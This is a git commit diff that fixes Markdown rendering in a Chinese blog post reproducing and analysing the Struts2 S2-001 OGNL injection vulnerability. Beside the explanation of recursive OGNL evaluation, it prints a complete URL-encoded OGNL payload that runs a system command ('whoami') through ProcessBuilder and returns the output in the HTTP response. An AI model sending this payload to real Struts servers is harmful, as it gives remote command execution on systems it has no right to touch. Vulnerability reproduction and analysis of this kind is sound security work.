fix: 修复文档解析错误

--- a/_posts/JAVA安全/s2-001复现分析/2021-8-11-[JAVA安全]-s2-001复现分析.md
+++ b/_posts/JAVA安全/s2-001复现分析/2021-8-11-[JAVA安全]-s2-001复现分析.md
@@ -1,7 +1,7 @@
 ---
 title: s2-001复现分析
 date: 2021-08-10 21:05:49
-categories: 
+categories:
 - 代码审计
 tags:
 - struts2
@@ -27,7 +27,7 @@ The 'altSyntax' feature of WebWork 2.1+ and Struts 2 allows OGNL expressions to 
 ```
 
 ```shell
-The user could leave the 'phoneNumber' field blank to trigger the validation error, then populate the 'name' field with %{1+1}. When the form is re-displayed to the user, the value of the 'name' field will be '2'. The reason is the value field is, by default, processed as %{name}, and since OGNL expressions are evaluated recursively, it is evaluated as if the expression was %{%{1+1}}.
+The user could leave the 'phoneNumber' field blank to trigger the validation error, then populate the 'name' field with `%`{1+1}. When the form is re-displayed to the user, the value of the 'name' field will be '2'. The reason is the value field is, by default, processed as %{name}, and since OGNL expressions are evaluated recursively, it is evaluated as if the expression was `%`{`%`{1+1}}.
 
 The OGNL parsing code is actually in XWork and not in WebWork 2 or Struts 2.
 ```
@@ -44,7 +44,7 @@ WebWork 2.1+和Struts2的“altSyntax”功能允许将OGNL表达式插入文本
 
 用户可以将“ phoneNumber”字段留空以触发验证错误，然后在“ name”字段中填充％{1 + 1}。 当表单重新显示给用户时，“名称”字段的值将为“ 2”。 原因是默认情况下，值字段被处理为％{name}，并且由于OGNL表达式是递归求值的，因此它的计算就好像表达式是％{％{1 + 1}}一样。
 
-OGNL解析代码实际上在XWork中，而不在WebWork 2或Struts 2中。 
+OGNL解析代码实际上在XWork中，而不在WebWork 2或Struts 2中。
 
 
 关键点在这两句话：
@@ -74,7 +74,7 @@ https://juejin.cn/post/6844904013683507207 ognl语法介绍
 
 默认情况下，值字段被处理为％{name}，并且由于OGNL表达式是递归求值的，因此它的计算就好像表达式是％{％{1 + 1}}一样。
 
-我们输入了`%{233*233}`按理应该返回`%{233*233}`。但是s2会给输入加上`%{}`,所以变成了`%{%{233*233}}`。因为translateVariables方法递归执行了ognl表达式。所以计算了`233*233`。
+我们输入了`%{233*233}`按理应该返回`%{233*233}`。但是s2会给输入加上`%{}`,所以变成了`%{`%`{233*233}}`。因为translateVariables方法递归执行了ognl表达式。所以计算了`233*233`。
 `altSyntax` 功能允许将OGNL表达式插入到文本字符串中并以递归方式处理。
 
 ## 2.poc利用
@@ -101,7 +101,7 @@ poc:
 命令执行payload:
 
 ```java
-%25{%23a%3d(new+java.lang.ProcessBuilder(new+java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),%23b%3d%23a.getInputStream(),%23c%3dnew+java.io.InputStreamReader(%23b),%23d%3dnew+java.io.BufferedReader(%23c),%23e%3dnew+char[50000],%23d.read(%23e),%23f%3d%23context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),%23f.getWriter().println(new+java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()}
+%25{`%`23a%3d(new+java.lang.ProcessBuilder(new+java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),%23b%3d%23a.getInputStream(),%23c%3dnew+java.io.InputStreamReader(%23b),%23d%3dnew+java.io.BufferedReader(%23c),%23e%3dnew+char[50000],%23d.read(%23e),%23f%3d%23context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),%23f.getWriter().println(new+java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()}
 ```
 
 执行结果：
